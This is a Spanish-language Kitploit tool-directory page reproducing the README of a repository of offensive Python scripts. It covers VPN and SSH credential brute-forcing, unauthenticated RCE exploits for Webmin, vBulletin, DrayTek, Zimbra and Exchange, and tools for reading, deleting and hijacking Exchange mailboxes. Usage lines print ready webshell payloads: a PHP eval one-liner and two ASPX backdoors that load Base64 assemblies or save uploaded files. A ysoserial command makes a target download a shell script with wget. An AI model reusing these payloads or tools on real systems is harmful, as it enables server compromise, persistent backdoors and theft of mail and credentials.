Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Homework-of-Python — Python codes of my blog. | Kitploit
Herramientas/GitHubGitHub/3gstudent/homework-of-python
Vulnerability ScannersPassword AttacksExploitationWeb Application ExploitationInformation GatheringPost-ExploitationRed TeamingPayload Development
GitHub3gstudent/homework-of-python

Homework-of-Python

Python codes of my blog.

Ver Repositorio
412126hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Homework-of-Python

Códigos Python de mi blog.

pptp_password_hack.py

Usa un ataque de fuerza bruta para obtener la contraseña de la VPN PPTP.

Leerá las contraseñas del archivo (llamado wordlist) y luego usará pptpsetup para conectarse al servidor.

El intervalo de tiempo es de 10 segundos.


portscan.py

Se usa para escanear puertos.

El tiempo de espera es de 3 segundos.

versión en c++:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

Se usa para obtener la IP a partir de la URL.

Se puede usar directamente el resultado de Sublist3r.

file_deduplication(For_urltoip).py

Se usa para eliminar IP duplicadas del resultado de Sublist3r.

Se puede usar directamente el resultado de urltoip.py.

Las IP se pueden ordenar usando Sublime (F9).


file_deduplication.py

Se usa para eliminar elementos duplicados de un archivo.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

Referencia:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

Se usa para llamar a la API de fofa e imprimir las IP de los resultados.

Puedes obtener 100 resultados.

fofa_api_VIP.py

Se usa para llamar a la API de fofa e imprimir las IP de los resultados.

Si eres VIP, obtendrás 10000 resultados.


vBulletin_5.x_0day_pre-auth_RCE.py

Referencia:

https://seclists.org/fulldisclosure/2019/Sep/31

Ej.

root@kitploit:~
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

Referencia:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

Ej.

root@kitploit:~
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Se usa para exportar las contraseñas de Firefox.

get_Exchange_version.py

Se usa para obtener la versión de Exchange.

Primero obtén el BuildNumber a través del código fuente de la URL y luego obtén la versión.

Referencia:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

Se usa para escanear la vulnerabilidad RCE de SMBv3.

El tiempo de espera es de 3 segundos.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

Referencia:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

Los dispositivos DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta y Vigor300B 1.3.3_Beta, 1.4.2.1_Beta y 1.4.4_Beta permiten la ejecución remota de código como root (sin autenticación) mediante metacaracteres de shell en la URI cgi-bin/mainfunction.cgi..

Productos afectados:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Usa la API SOAP de Zimbra para conectarte al servidor de correo de Zimbra.

Uso:

root@kitploit:~
      Zimbra_SOAP_API.py <url> <username> <password> <mode>

modo:

  • low autenticación para token bajo
  • admin autenticación para token de administrador
  • ssrf Usa CVE-2019-9621 para obtener el token de administrador

Ej:

root@kitploit:~
      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Se usa para comprobar cuentas válidas de Exchange Web Service (soporta texto plano y ntlmhash)

Referencia:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

Uso:

root@kitploit:~
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

Ej.

root@kitploit:~
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Se usa para acceder a Autodiscover.xml y obtener la configuración del usuario (soporta texto plano y ntlmhash)

Uso:

root@kitploit:~
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

Ej.

root@kitploit:~
checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

Modo extra de checkAutodiscover.py

Añade un parámetro

ewsManage.py

Se usa para acceder a Exchange Web Service (soporta texto plano y ntlmhash)

Uso:

root@kitploit:~
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


Ej.

root@kitploit:~
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

Se usa para comprobar credenciales válidas de SSH (soporta contraseña y archivo de clave privada)

Uso:

root@kitploit:~
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

Ej.

root@kitploit:~
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

Ejecución remota de comandos a través de SSH (soporta contraseña y archivo de clave privada)

Uso:

root@kitploit:~
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

Ej.

root@kitploit:~
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

Se usa para comprobar credenciales válidas de EAS (Exchange Server ActiveSync)

Uso:

root@kitploit:~
easCheck.py <host> <user> <password>

Ej.

root@kitploit:~
easCheck.py 192.168.1.1 user1 password1

checkOWA.py

Se usa para comprobar cuentas válidas de Exchange conectándose a OWA.

Uso:

root@kitploit:~
checkOWA.py <url> <user> <password>

owaManage.py

Se usa para leer correos conectándose a OWA.

Uso:

root@kitploit:~
owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

Usa IMAP para conectarse al servidor de correo.

Uso:

root@kitploit:~
imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

Se usa para implementar autenticación NTLM y comunicarse con execCmd.aspx

Los datos de comunicación están codificados con Base64

Uso:

root@kitploit:~
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

Versión en C#: SharpExchangeBackdoor.cs

Se usa para enviar payload a la webshell backdoor de Exchange.

Soporta:

  • assemblyLoad
  • webshellWrite

Uso:

root@kitploit:~
    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

ej.

root@kitploit:~
    SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

Zimbra_deserialization_RCE(CVE-2019-6980).py

Deserialización insegura de objetos - IMAP

Uso:

root@kitploit:~
<url> <user> <password> <payload path>

Ej.

root@kitploit:~
https://192.168.1.1 [email protected] password1 payload.obj

Nota:

Puedes generar el payload.obj de esta forma:

java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget https://192.168.1.1/test.sh --no-check-certificate -O /tmp/test.sh" > payload.obj


ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py

ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py

ExchangeDeserializeShell-NoAuth-ghostfile.py

Se usa para probar la ejecución de código mediante deserialización en Exchange.
Desde los permisos de lectura y escritura de archivos de Exchange hasta la ejecución de código mediante deserialización. Debes modificar la machineKey en %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config para implementar la ejecución de código mediante deserialización. <path>: owa o ecp

Uso:

root@kitploit:~
    <url> <key> <path>

ej.

root@kitploit:~
 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
 mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

Exchange_EWS_XML_Parser.py

Se usa para analizar mensajes XML SOAP de Exchange.


eacManage.py

Se usa para acceder al centro de administración de Exchange

Uso:

root@kitploit:~
eacManage.py <url> <user> <password> <command>
<command>:
- ListAdminRoles
- NewAdminRoles
- EditAdminRoles
- DeleteAdminRoles
- AddMailbox
- RemoveMailbox
- ExportAllMailbox          
- GetCertificate 
- ExportCertificate          
          

vSphereAutomationAPI_Manage.py

Usa la API de Automatización de vSphere (v7.0U1+) para administrar la VM

Soporta VM Windows y Linux

vSphereWebServicesAPI_Manage.py

Usa la API de Servicios Web de vSphere para administrar la VM

Referencia: https://github.com/vmware/pyvmomi/

Instalación: pip install --upgrade pyvmomi

vCenterLDAP_Manage.py

Se usa para administrar la base de datos LDAP en vCenter.


SolarWindsOrion_Manage.py

Se usa para administrar la plataforma SolarWinds Orion

SolarWindsOrionAPI_Manage.py

Usa la API de SolarWinds Orion para administrar la plataforma Orion


MailEnableManage.py

Se usa para administrar el servidor de correo MailEnable


blind_XXEPlatform_CVE-2019-9670.py

Soporta la recepción de resultados mediante protocolo HTTP o FTP.


ewsManage_Downloader.py

Se usa para acceder a Exchange Web Service (soporta texto plano y ntlmhash)

ewsManage_exchangelib_Downloader.py

Se usa para acceder a Exchange Web Service (soporta texto plano y ntlmhash)

ewsManage_requests_ntlm_Downloader.py

Usa requests_ntlm2 para acceder a Exchange Web Service (soporta texto plano y ntlmhash)

ewsManage_requests_ntlm_Session_Downloader.py

Usa requests_ntlm2 para acceder a Exchange Web Service (soporta texto plano y ntlmhash)

Usa session para reducir los datos de comunicación


vCenter_ExtraCertFromMdb.py

Modificado a partir de https://github.com/horizon3ai/vcenter_saml_login

vCenter_GenerateLoginCookie.py

Modificado a partir de https://github.com/horizon3ai/vcenter_saml_login


Exchange_GetVersion_MatchVul.py

Se usa para obtener la versión de Exchange y compararla con las vulnerabilidades existentes

Exchange_GetVersion_ParseFromFile.py

Se usa para obtener la versión de Exchange y analizar la versión desde https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019

Debes guardar https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 como exchange.data

Exchange_GetVersion_ParseFromWebsite.py

Se usa para obtener la versión de Exchange y analizar la versión desde https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019


Exchange_GetInternalIP.py

Se usa para obtener la IP interna de Exchange

Basado en msf auxiliary/scanner/http/owa_iis_internal_ip, pero soporta más servidores Exchange.


vRealizeOperationsManager_GetVersion.py

Se usa para obtener la versión de vRealize Operations Manager


BIG-IP_RunBash.py

Usa bash para ejecutar comandos


SophosUTM_plxDecrypter.py

Se usa para descifrar el archivo .plx de Sophos UTM

Referencia:

https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

https://github.com/the6p4c/bfs_extract

SophosUTM_ConfigParser.py

Se usa para analizar la configuración de Sophos UTM


Descargar herramienta